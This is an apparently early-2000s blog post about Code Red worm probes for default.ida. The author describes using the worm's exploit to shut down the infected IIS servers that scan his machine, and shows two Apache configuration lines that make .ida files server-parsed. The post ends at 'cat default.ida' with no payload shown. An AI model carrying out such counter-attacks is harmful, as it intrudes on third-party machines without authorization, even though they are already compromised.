My last CR blog entry (hopefully)

Ok, I'm tired of talking about CR, so I found this code that uses the CR exploit to shut down the infected IIS server that's looking for default.ida on my server. It's all pretty simple -- just add 2 lines to Apache's conf file, create a default.ida file, and restart the httpd daemon. Code follows:

# grep .ida /etc/apache/httpd.conf
AddType text/html .ida
AddHandler server-parsed .ida

# cat default.ida